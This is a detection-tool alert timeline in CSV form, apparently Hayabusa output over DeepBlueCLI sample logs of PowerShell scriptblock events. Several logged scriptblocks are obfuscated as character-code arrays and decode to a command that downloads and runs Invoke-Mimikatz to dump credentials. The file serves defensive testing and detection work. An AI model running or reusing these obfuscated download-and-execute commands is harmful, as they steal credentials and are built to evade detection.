reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:01:22.441 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? 
"","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:01:22.442 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:01:22.443 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:01:28.780 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:08.894 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:08.929 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:08.986 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.026 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.052 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.119 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.152 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.159 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.189 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.191 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:09.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('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'|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( 
[runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('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'|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:13:38.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $eNv:COmSPEc[4,15,25]-JoIN'') ([ChAr[]] (73, 69 , 88 ,32 ,40,78 ,101 ,119 ,45, 79, 98,106 ,101,99 , 116 ,32 ,78,101, 116, 46,87, 101 ,98 , 67 ,108 ,105,101 ,110, 116 ,41 , 46, 68, 111 ,119 , 110 , 108 , 111 ,97 ,100 , 83,116, 114,105 , 110, 103, 40 , 39, 104, 116 , 116,112 , 115,58,47,47 ,114, 97 ,119,46 , 103,105 , 116, 104,117, 98 ,117 , 115 , 101 ,114,99, 111 ,110 , 116,101 ,110 , 116, 46 , 99 , 111,109 ,47 ,109 ,97,116 , 116,105,102, 101 , 115 , 116,97 , 116 ,105 ,111 , 110,47,80,111 ,119 , 101,114,83, 112, 108,111, 105,116 ,47,109, 97 , 115 , 116, 101 ,114,47 ,69 ,120, 102,105, 108,116 , 114, 97,116 , 105,111,110, 47 , 73,110 ,118 ,111 , 107 , 101,45 , 77, 105 ,109 , 105, 107 , 97 , 116, 122 , 46 ,112 ,115, 49, 39 ,41 , 59 , 32,73 , 110 , 118 ,111 ,107 ,101,45,77,105 , 109 ,105, 107 ,97, 116 ,122,32 ,45 , 68 ,117 ,109,112 , 67 ,114 , 101,100 , 115 )-join '')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:13:52.552 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"[sTRInG]::jOiN('' , (( 49 ,45 , 58,20,28 , '4e',65,77 , '2d' ,'4f' ,62 , '6a' , 65,63, 74 
,20 ,'4e', 65 ,74 ,'2e' ,57, 65 , 62,43 ,'6c',69, 65 , '6e' , 74 ,29 ,'2e',44,'6f' , 77 ,'6e','6c' , '6f' ,61, 64 ,53 , 74,72 ,69 ,'6e',67, 28, 27 , 68 ,74, 74,70 ,73, '3a', '2f','2f', 72, 61, 77 , '2e',67,69, 74 ,68 , 75,62, 75, 73,65 ,72,63, '6f','6e',74 ,65, '6e', 74 ,'2e',63 ,'6f', '6d','2f' , '6d', 61 ,74 ,74, 69,66 , 65, 73 ,74 ,61, 74 , 69 ,'6f' , '6e', '2f' ,50,'6f',77, 65,72,53 ,70, '6c' , '6f' ,69 ,74, '2f' , '6d' , 61 , 73 , 74,65,72 , '2f' ,45,78,66, 69, '6c', 74 , 72,61, 74,69,'6f' , '6e' , '2f' , 49,'6e' , 76, '6f','6b' ,65 , '2d' , '4d' ,69,'6d' , 69, '6b',61 , 74 , '7a' , '2e',70, 73 , 31 , 27, 29 ,'3b' ,20 ,49 ,'6e' , 76,'6f', '6b', 65, '2d', '4d',69, '6d' ,69,'6b' , 61 ,74, '7a' , 20 , '2d' ,44 , 75,'6d' , 70, 43, 72 ,65 ,64 , 73)|FoReaCh{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}))|&( $enV:PuBlic[13]+$eNv:PUbliC[5]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:13:52.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.419 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.432 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input 
$RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.526 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.531 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.534 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.537 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} 
$Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.543 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.590 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.603 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input 
@(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.765 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.772 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:24.809 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $ENV:pUbLIc[13]+$EnV:pubLIc[5]+'X') ([STrIng]::JOin('' , ((111 ,105, 130 , 40,50,116 ,145 , 167, 55,117,142 , 152 ,145,143 ,164 , 40, 116,145,164,56, 127, 145 ,142, 103 ,154, 151 ,145 ,156 , 164,51, 56 , 104 ,157, 167 ,156 , 154 , 157 , 141 , 144, 123 ,164,162 ,151, 156,147, 50 ,47 ,150 , 164,164,160 , 163 , 72,57, 57,162, 141,167 , 56,147 ,151, 164,150, 165, 142 ,165 , 163, 145, 162,143 ,157, 156 ,164 ,145,156 , 164,56 ,143 ,157 ,155,57, 155 ,141, 164 , 164, 151 , 146,145 ,163, 164 , 141, 164 ,151, 157, 156 ,57 , 120 ,157,167 , 145,162 , 123,160 , 154, 157, 151, 164, 57,155 , 141, 163 ,164,145,162,57,105, 170 , 146,151, 154, 164 , 162 
, 141,164,151,157,156 , 57,111,156 , 166 , 157, 153, 145,55, 115 ,151, 155 ,151, 153,141, 164 ,172,56, 160 , 163, 61 ,47 ,51,73 , 40,111,156 , 166, 157 ,153 , 145 ,55 ,115, 151 , 155 ,151 ,153 , 141, 164 ,172 ,40,55, 104,165 , 155, 160 ,103, 162 , 145 , 144 , 163 )| FOrEacH { ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) } )))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:51.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $vErBOSePreFErencE.TOSTRING()[1,3]+'X'-joIN'')(( '1001001}1000101r1011000C100000&101000&1001110C1100101r1110111C101101;1001111v1100010;1101010r1100101v1100011j1110100v100000X1001110o1100101}1110100X101110}1010111;1100101r1100010v1000011X1101100v1101001j1100101v1101110j1110100}101001j101110}1000100j1101111g1110111g1101110}1101100g1101111g1100001;1100100;1010011}1110100;1110010g1101001X1101110&1100111X101000v100111}1101000;1110100r1110100j1110000}1110011v111010j101111r101111}1110010o1100001X1110111r101110r1100111X1101001&1110100o1101000g1110101j1100010C1110101}1110011&1100101X1110010}1100011}1101111j1101110v1110100j1100101C1101110;1110100r101110&1100011r1101111;1101101&101111&1101101X1100001}1110100}1110100;1101001o1100110v1100101;1110011C1110100C1100001j1110100r1101001;1101111o1101110o101111j1010000&1101111X1110111}1100101j1110010j1010011&1110000;1101100r1101111r1101001;1110100o101111&1101101v1100001r1110011;1110100g1100101j1110010j101111r1000101v1111000r1100110j1101001X1101100C1110100r1110010;1100001o1110100C1101001;1101111X1101110j101111C1001001X1101110;1110110}11011
11r1101011&1100101j101101&1001101r1101001v1101101;1101001o1101011o1100001&1110100o1111010v101110g1110000r1110011}110001g100111o101001v111011j100000;1001001j1101110r1110110X1101111v1101011}1100101v101101;1001101r1101001&1101101;1101001C1101011v1100001&1110100j1111010}100000}101101}1000100C1110101v1101101r1110000v1000011j1110010r1100101v1100100;1110011' -splIT 'o'-splIt '&' -SPlIT 'r' -SplIt 'v' -sPLIT 'g'-SPliT';'-spLIT'X'-sPlIt'}' -sPLIT 'C'-SPLIT'j'|FOReaCH-ObjEct {([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) })-JOIN '' )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:14:51.666 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('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'|CONveRTTO-secUResTRING -KEy 196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"( [rUntImE.iNtEROPSeRviCEs.mARShaL]::pTRtOSTriNGBstR([ruNtIMe.iNTeropSERVIcES.MarsHAl]::seCUResTRingtObstr($('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'|CONveRTTO-secUResTRING -KEy 
196,47,72,214,193,53,146,52,139,252,69,219,170,135,151,62,90,5,213,36,116,154,71,183) ) ))| .( $VErBosePRefERencE.toStrING()[1,3]+'x'-JOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.455 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:15:39.469 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 